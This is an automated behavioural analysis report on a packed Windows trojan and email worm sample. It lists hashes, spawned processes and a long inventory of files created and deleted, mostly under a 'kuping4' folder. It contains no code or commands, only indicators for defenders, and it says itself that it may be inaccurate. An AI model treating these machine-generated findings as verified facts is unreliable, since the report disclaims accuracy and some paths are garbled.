Trojan.Win32.Badur.htyo (Kaspersky), Trojan.Generic.11256692 (AdAware), mzpefinder_pcap_file.YR, GenericEmailWorm.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8a3740ff1eea52073cde0db49b0d398f
SHA1: 76974574f739cfbb0d80e2a5db2209f0e950bfa2
SHA256: 5d1b68e7ec358028619d4bd4f8621dfffb8ab1e0991fe5bcbc142832213fcdf5
SSDeep: 6144:SSOw/y4d67EgN0iC1bLY7coVYh4Nf9fG5 UmycGxHLLm4Yw7Ijz:SSOf4TgNJp3YOFNKIycGNvm4J70
Size: 376116 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-21 05:48:12
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
kp4_Mini.exe:660
kuping_v4.exe:600
dwwin.exe:752
getnew.exe:1672
kuping_b_53390.exe:432
The Trojan injects its code into the following process(es):
%original file name%.exe:1196
File activity
The process kp4_Mini.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\kuping4\Universal\UniversalMiniSkin\Mini.ico (1159 bytes)
C:\kuping4\softset.ini (370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_83.tmp (225 bytes)
C:\kuping4\Universal\UniversalMiniSkin\skinconfig.ini (89 bytes)
%Documents and Settings%\%current user%\My Documents\Universal\Universal.ini (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MI_89.tmp (1 bytes)
C:\kuping4\Universal\unrar.dll (185 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\bg.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\309d_appcompat.txt (20221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RM_87.tmp (874 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_84.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_8B.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_8D.tmp (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\close.png (2 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\small.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\seach.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\skin.ini (822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_86.tmp (213792 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\seach-btn.png (1 bytes)
C:\kuping4\Universal\UniversalMiniSkin\默认\ui\mini\logo.png (4 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CA_84.tmp (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\seach.png (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\close.png (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\small.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_86.tmp (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\seach-btn.png (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈà(0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MI_89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8A.tmp (0 bytes)
C:\op_83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RM_87.tmp (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\bg.png (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_88.tmp (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\logo.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8E.tmp (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui (0 bytes)
C:\kuping4\Universal\UniversalMiniSkin (0 bytes)
The process kuping_v4.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\kuping4\Update\soft.ini (1714 bytes)
C:\kuping4\softset.ini (736 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.wallba[1].txt (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_80.tmp (126 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
C:\kuping4\TempDownLoad\Home\11275.jpg_0 (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\Liveindex[1].htm (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\stat[1].php (1163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_81.tmp (2 bytes)
C:\kuping4\Kpclick.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_7F.tmp (631 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\stat[1].gif (43 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\DW_81.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_7F.tmp (0 bytes)
C:\kuping4\TempDownLoad\Home\11275.jpg_0 (0 bytes)
The process dwwin.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\11373A.dmp (127725 bytes)
The process getnew.exe:1672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\kuping4\Update\soft.ini (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_82.tmp (426 bytes)
C:\kuping4\Update\updatelog.ini (31 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\DW_82.tmp (0 bytes)
The process %original file name%.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\desktop.ini (67 bytes)
%Program Files%\kuping_b_53390.exe (37274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPIRWXAZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\desktop.ini (67 bytes)
The process kuping_b_53390.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-screen.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\bg_focus.png (327 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\LocalManagement_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-6.png (210 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-mause.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\management.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\computer.png (1568 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\aboutme-text.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\delete.png (960 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@img.wallba[1].txt (321 bytes)
C:\kuping4\TempDownLoad\Home\11272.jpg (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\image-bg.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\recover.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\update-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\button-skin-add.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\UploadImageLayer.ini (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\tick_fcous.png (714 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\cancel-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\min.png (338 bytes)
C:\kuping4\TempDownLoad\UserLive\tempfile\userlive.xml (480 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\notice\sure_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\cursor\right.cur (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\1111.png (199 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\serch-bg.png (161 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\cancel-button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\bg_di.png (306 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\RegisterSkin.ini (693 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¿áÆÃÂÂ4\¿áÆÃÂÂ4.lnk (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_block.png (95 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\update.png (556 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\blue.png (307 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\explain.png (559 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add-app-bg_02.png (523 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\scroll-bg.png (305 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SkinInfo.ini (19 bytes)
C:\kuping4\TempDownLoad\Home\11276.jpg (392 bytes)
C:\kuping4\kuping_v4.exe (5620 bytes)
C:\kuping4\Kp_BootClry.exe (1137 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\left-bck.png (1 bytes)
C:\kuping4\SystemConfig\setting.ini (255 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.153624[1].txt (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\MsgBox_1.ini (729 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\share.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\notice\notice.png (1 bytes)
C:\kuping4\Appsoftconfig\image\clear.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin_bg_02.png (791 bytes)
C:\kuping4\UniversalFunction.dll (4840 bytes)
C:\kuping4\Appsoftconfig\image\ielogo.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\login_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress_bg.png (283 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-03_01.png (784 bytes)
C:\kuping4\Uninstall\StartMenu.exe (24 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Conventional-set.png (988 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\attention.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-icon.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\list-pause.png (669 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-3.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\max.png (157 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\App.png (868 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\x.png (943 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\lijixiufu.png (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-2.png (1 bytes)
C:\kuping4\TempDownLoad\StartUp\tempfile\StartUp.xml (784 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_deck.png (175 bytes)
C:\kuping4\MSGBoxSkin\UI\stop_button.png (1 bytes)
C:\kuping4\Appsoftconfig\image\buttoncmd.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kp4.2flash_01.png (791 bytes)
C:\kuping4\Update\SkinResource\CheckUpdate.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\Default-recovery_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\bg_02.png (4 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\center-line.png (128 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\collection.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig (4 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\bg.png (341 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\theme.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\Uninstall.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IconListEx\cancel.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\close.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\album.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\UpDateMenu_Layer.ini (1 bytes)
C:\kuping4\MSGBoxSkin\MSGBoxSkin.ini (2 bytes)
C:\kuping4\MSGBoxSkin\UI\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list-Screen-saver.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\bg_02.png (1765 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\mainsub.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\81AVK52J\index[1].htm (750 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\progress.png (107 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\MouseNavigation_Layer.ini (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\search.png (681 bytes)
C:\kuping4\KPUpdater.dll (3439 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\smile.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\LZMA.dll (68 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\re-choice.png (371 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\delete.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\help.png (633 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\home.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\My-resources\list_wallpaper.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\mause.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\lefr_bg.png (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMZG52N\h[1].js (5 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\SettingMenuDlgConfig\ApplicationMenu_Layer.ini (3 bytes)
C:\kuping4\QuickenFunctionConfig\Management\status.ini (161 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\mainsub.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\newcreat-bg.png (171 bytes)
C:\kuping4\Update\SkinResource\Minimize.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\Modify-head.png (922 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\iconlist_bg.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\¿áÆÃÂÂ4.0flash_02.png (414 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\tick.png (227 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\bg_top.png (984 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\TailorHeadImageLayer.ini (1 bytes)
C:\kuping4\TempDownLoad\Home\11273.jpg (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\sure_button.png (1 bytes)
C:\kuping4\KpInstallTheme.exe (1764 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\update-online_botton.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\silent_download.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\newcreat-focus.png (214 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\progress_focus.png (190 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\focus.png (222 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\theme-max.png (1529 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\icon_focus.png (483 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\failRefresh.png (382 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\logo_s.png (970 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\add.png (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@img.wallba[2].txt (545 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\MenuSetConfig.ini (48 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\list-bg.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\MainSkin.ini (697 bytes)
C:\kuping4\Universal\Soft\softset.ini (78 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\cancel.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\tag.ini (205 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kupingbg-03_02.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Personal-center.png (196 bytes)
C:\kuping4\MSGBoxSkin\UI\retry_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\cursor\left.cur (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\tag-line.png (108 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\notMulti.png (3 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\help_icon.png (730 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\error.png (544 bytes)
C:\kuping4\Universal\skinConfig.rar (980 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\silder.png (363 bytes)
C:\kuping4\VersionConfig.xml (1060 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\notcheak.png (391 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\feedback\bg.png (1372 bytes)
C:\kuping4\getnew.exe (1960 bytes)
C:\kuping4\SpecialSubject.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\cancel.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\down.png (178 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\SkinCenter.ini (1 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5880 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\CenterDlgConfig\MainSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\loading.png (196 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\jindutiao.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\line.png (109 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\reg-btn.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\focus-bg.png (107 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\notchoose.png (879 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\aboutme.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress_bg1.png (258 bytes)
C:\kuping4\TempDownLoad\UserLive\version.ini (29 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\scroll_thumb.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\install-button.png (1 bytes)
C:\kuping4\QuickenFunctionConfig\Management\ManagementCommerce.xml (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\white.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin_bg_03.png (421 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\delete.png (1 bytes)
C:\kuping4\info.ini (16 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\login_bg.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\log-bckhead.png (4 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\tui-chu.png (232 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\application.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\close.png (2 bytes)
C:\kuping4\Appsoftconfig\image\buttonclear.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\delete.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\AppDlgConfig\MainDlgSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\loading.png (2 bytes)
C:\kuping4\Uninstall\skinConfig_un\ĬÈÃÂÂ\ui\Uninstall\advert.png (980 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\bg_top.png (984 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\NoticeDlgSkin.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\line_w.png (91 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\pro.png (338 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\SkinCenterDownload.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\notMulti.png (912 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\IconsFolderNavigation_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\loading.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\delete.png (486 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\myBaoku.png (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\load.png (3 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\config.153624[1].xml (266 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\install_icon.png (971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_7E.tmp (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\cover.png (109 bytes)
C:\kuping4\TempDownLoad\TagInfo\list_win7.xml (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\daohang\title-bg.png (2 bytes)
C:\kuping4\Universal\UniversalMiniSkin\ĬÈÃÂÂ\ui\mini\bg.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\set.png (522 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9LJNTUH\stat[1].gif (43 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\ImageLook\bg_nf.png (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\download.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\cut_button-ato.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\kankan.png (1921 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\SkinCenter\skin.png (629 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\color\green.png (324 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\tooltipUi\bg_01.png (708 bytes)
C:\kuping4\MSGBoxSkin\UI\success.png (2 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\UpdateNotice\choose.png (883 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\Login_Layer.ini (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\new-bg.png (274 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\bg-5.png (214 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\newUi\news.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\upload_button.png (588 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\progress\progress_bg2.png (182 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\slice\sure_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\login\ui\bg.png (784 bytes)
C:\kuping4\TempDownLoad\Home\11279.jpg (392 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\meihua.png (196 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\ui\UpdateSkin\scroll_thumb.png (744 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\list\page.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\about\sure_button.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\application\scroll_block.png (763 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\DownloadWebDlg\notice-bg.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateNetError.ini (633 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\UpdateUi\UpdateDownloadPage.ini (592 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\bg1.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\loading2.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\Personal-information\city-about.png (1 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\Menu\menu_move.png (440 bytes)
C:\kuping4\skinConfig\ĬÈÃÂÂ\ui\IndivCenter\upload\Label-input-box.png (258 bytes)
